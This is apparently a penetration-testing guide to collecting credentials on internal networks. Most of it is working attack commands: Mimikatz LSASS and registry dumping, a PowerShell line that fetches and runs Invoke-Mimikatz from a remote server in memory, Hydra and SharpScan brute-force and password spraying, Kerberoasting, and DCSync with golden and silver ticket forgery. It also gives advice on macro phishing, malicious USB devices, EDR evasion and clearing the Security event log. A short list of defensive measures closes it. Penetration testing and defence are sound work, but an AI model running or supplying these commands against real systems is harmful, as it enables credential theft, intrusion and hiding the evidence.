Stop Random Brute‑Force: The Complete Guide to Internal Network Credential Collection

Collecting internal network credentials is a core phase of penetration testing; attackers who obtain legitimate credentials can move laterally, elevate privileges, and compromise critical business systems, while defenders must understand the techniques to build effective mitigations.

Local System Credential Extraction (Windows)

Memory Credential Extraction

Use Mimikatz to inject lsass.exe and read plaintext passwords, NTLM hashes, and tickets. Example commands: privilege::debug then sekurlsa::logonPasswords.

For Windows Vista and later, LM hashes are no longer stored; for Windows 8.1/Server 2012 R2 and above, cleartext passwords require enabling the wdigest registry key

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest

(set UseLogonCredential=1) and a user re‑login.

To avoid file‑based detection on newer systems, load Mimikatz in memory via PowerShell, e.g.,

iex (New-Object Net.WebClient).DownloadString('http://legit‑server/Invoke-Mimikatz.ps1')

.

Registry Credential Extraction

Extract SAM hashes by saving the registry hive: reg save HKLM\SAM SAM.hiv and reg save HKLM\SYSTEM SYSTEM.hiv, then crack with hashcat or John.

RDP cached credentials are stored under HKLM\SOFTWARE\Microsoft\Terminal Server Client\Servers; retrieve with Mimikatz module ts::mstsc.

Credential Manager caches are under HKCU\Software\Microsoft\Credentials and HKCU\Software\Microsoft\Protect; list with cmdkey /list and extract via Mimikatz vault::cred.

Application Configuration and Log Extraction

Web server configs (IIS web.config, Tomcat server.xml) may contain cleartext DB connection strings.

Client apps such as FileZilla ( %APPDATA%\FileZilla\sitemanager.xml) and Outlook store credentials that can be decoded with custom scripts.

Windows Security Event logs (ID 4624/4625) can be exported with wevtutil qe Security /q:"*[System[EventID=4624]]" /f:text to harvest usernames and source IPs.

Local System Credential Extraction (Linux)

Core Configuration Files

/etc/passwd

is world‑readable; /etc/shadow holds SHA‑512 password hashes, readable by root. After privilege escalation, dump /etc/shadow and crack with hashcat.

Service configs (Apache httpd.conf, Nginx nginx.conf, MySQL my.cnf, SSH /etc/ssh/sshd_config) may embed credentials.

Memory and Process Credential Extraction

Identify a target process (e.g., MySQL) with ps -ef | grep mysql, then generate a core dump using GDB: gdb --pid [PID] -batch -ex "generate-core-file". Search the dump with strings for keywords like "password".

History and Cache Extraction

Search ~/.bash_history for password patterns: cat ~/.bash_history | grep -E "password|pass| -p".

Git credential cache resides in ~/.git-credentials and can be examined for stored tokens.

Network Service Credential Detection

Asset Scanning and Service Identification

Use SharpScan for ARP‑based host discovery: SharpScan.exe -h 192.168.1.0/24 -nopoc.

Port scan common services (22, 135, 139/445, 3389, 3306, 5432) with SharpScan: SharpScan.exe -s 192.168.1.100 -p 1-1024 -d 0 -m 600.

Identify service versions with Nmap: nmap -sV 192.168.1.100 -p 445 to detect SMB vulnerabilities such as MS17‑010 or SMBGhost.

Weak‑Password Brute‑Force and Password Spraying

SMB brute‑force example:

SharpScan.exe -h 192.168.1.0/24 -m smb -uf user.txt -pwf pass.txt

.

SSH brute‑force with Hydra: hydra -L user.txt -P pass.txt -t 4 192.168.1.100 ssh (tune -t to 4‑8 threads).

RDP password‑spray example (to avoid account lockout):

SharpScan.exe -h 192.168.1.0/24 -m rdp -uf user.txt -pwf pass.txt

or use a single password across many accounts with

SharpScan.exe -h 192.168.1.100 -m passwordspray -uf user.txt -pw Password@123

. Pause 3‑5 seconds between attempts.

Database brute‑force: hydra -L user.txt -P pass.txt 192.168.1.100 mysql or SharpScan msql module for SQL Server.

Domain Credential Collection

Kerberoasting Attack

Enumerate SPNs: setspn -Q */* or SharpScan SharpScan.exe -h 192.168.1.100 -m userenum -uf user.txt.

Request service tickets with Mimikatz ( sekurlsa::tickets /export) or Rubeus ( Rubeus.exe kerberoast /outfile:tickets.kirbi).

Crack the exported tickets offline using hashcat: hashcat -m 13100 tickets.kirbi pass.txt.

Golden Ticket Creation

Dump the KRBTGT hash via DCSync: lsadump::dcsync /domain:example.com /user:krbtgt.

Forge a TGT with Mimikatz:

kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /krbtgt:... /ticket:golden.kirbi

and import to gain domain‑wide access.

Silver Ticket Creation

Obtain the target service account hash and forge an ST for a specific service, e.g., SMB:

kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /target:DC01.example.com /service:cifs /rc4:... /ticket:silver.kirbi

.

Social Engineering Techniques

Phishing Emails

Forge internal‑domain emails with urgent subjects (e.g., "[Urgent] System upgrade – reset password").

Attach macro‑enabled Office documents that execute PowerShell to steal local credentials.

Personalize attacks using publicly available employee information to increase click‑through rates.

Water‑hole and Physical Access Attacks

Compromise internal file servers and inject malicious macros into shared documents.

Pose as maintenance staff, use USB devices with malicious firmware, or access unlocked workstations to extract cached credentials.

Tool Selection and Practical Pitfalls

Prefer no‑file execution (PowerShell in‑memory, WMI) to evade EDR detection; obfuscate scripts.

Check account lockout policies (e.g., net accounts /domain) before brute‑forcing; use password‑spray to stay under thresholds.

Minimize log footprints: avoid noisy commands, clean event logs with wevtutil cl Security after operations.

Control scanning concurrency and use internal SOCKS5 proxies to hide source IPs.

Defensive Recommendations

Technical Measures

Enable Windows Credential Guard and LSA protection; enforce Kerberos pre‑authentication.

Implement strong password policies (≥12 characters, mixed case, symbols) and regular rotation.

Deploy EDR solutions to monitor memory injection and abnormal PowerShell activity; restrict RDP/SMB access to required IP ranges.

Patch high‑severity vulnerabilities promptly (e.g., MS17‑010, CVE‑2020‑1472) and disable unnecessary services.

Management Measures

Apply the principle of least privilege; separate admin accounts from daily work accounts.

Conduct regular security audits of domain and admin logins; monitor anomalous ticket requests.

Enforce temporary, scoped access for third‑party vendors.

User Awareness

Provide ongoing security training on phishing detection, password hygiene, and physical security.

Run simulated phishing campaigns and track click rates for targeted remediation.

Establish a clear reporting channel for suspicious communications.

In summary, internal credential collection spans local extraction, network service probing, domain‑level attacks, and social engineering. Mastery of these techniques enables effective penetration testing, while a layered defense—technical controls, strict management policies, and user education—mitigates the associated risks.